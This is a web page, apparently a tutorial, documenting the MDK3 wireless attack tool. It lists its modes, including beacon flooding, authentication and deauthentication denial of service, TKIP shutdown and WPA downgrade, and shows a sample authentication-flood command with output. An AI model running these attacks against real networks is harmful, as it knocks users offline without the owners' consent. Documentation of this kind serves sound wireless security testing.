MDK3

Description

MDK3 is a proof-of-concept tool to exploit common IEEE 802.11 protocol weaknesses. IMPORTANT: It is your responsibility to make sure you have permission from the network owner before running MDK against it.

Usage

Syntax

mdk3 <interface> <test_mode> [test_options]

Options

b   - Beacon Flood Mode
      Sends beacon frames to show fake APs at clients.
      This can sometimes crash network scanners and even drivers!
a   - Authentication DoS mode
      Sends authentication frames to all APs found in range.
      Too much clients freeze or reset some APs.
p   - Basic probing and ESSID Bruteforce mode
      Probes AP and check for answer, useful for checking if SSID has
      been correctly decloaked or if AP is in your adaptors sending range
      SSID Bruteforcing is also possible with this test mode.
d   - Deauthentication / Disassociation Amok Mode
      Kicks everybody found from AP
m   - Michael shutdown exploitation (TKIP)
      Cancels all traffic continuously
x   - 802.1X tests
w   - WIDS/WIPS Confusion
      Confuse/Abuse Intrusion Detection and Prevention Systems
f   - MAC filter bruteforce mode
      This test uses a list of known client MAC Adresses and tries to
      authenticate them to the given AP while dynamically changing
      its response timeout for best performance. It currently works only
      on APs who deny an open authentication request properly
g   - WPA Downgrade test
      deauthenticates Stations and APs sending WPA encrypted packets.
      With this test you can check if the sysadmin will try setting his
      network to WEP or disable encryption.

Example 

cyborg@cyborg:~$ sudo mdk3 wlan0 a

MDK3 Trying to get a new target AP...                  
AP 10:FE:ED:B7:A5:42 is responding!           
Connecting Client: 67:C6:69:73:51:FF to target AP: 10:FE:ED:B7:A5:42
Connecting Client: BB:EE:FD:15:E7:DC to target AP: 10:FE:ED:B7:A5:42
AP 10:FE:ED:B7:A5:42 seems to be INVULNERABLE!      
Device is still responding with   500 clients connected!
Trying to get a new target AP...                  
Connecting Client: 57:E0:30:8C:05:DD to target AP: 10:FE:ED:B7:A5:42
Connecting Client: 41:AF:E1:0B:64:4F to target AP: 10:FE:ED:B7:A5:42
AP 10:FE:ED:B7:A5:42 seems to be INVULNERABLE!      
Device is still responding with  1000 clients connected!
Trying to get a new target AP...                  
Connecting Client: F9:12:E5:FB:F4:92 to target AP: 10:FE:ED:B7:A5:42
Connecting Client: 3A:5A:EA:7C:7B:32 to target AP: 10:FE:ED:B7:A5:42
AP 10:FE:ED:B7:A5:42 seems to be INVULNERABLE!      
Device is still responding with  1500 clients connected!
Trying to get a new target AP...
0 Comments

Leave a reply

CONTACT US

We're are building as a community and a team. Be a part of it.

Sending

©2017 Ztrela Knowledge Solutions Pvt. Ltd

Log in with your credentials

Forgot your details?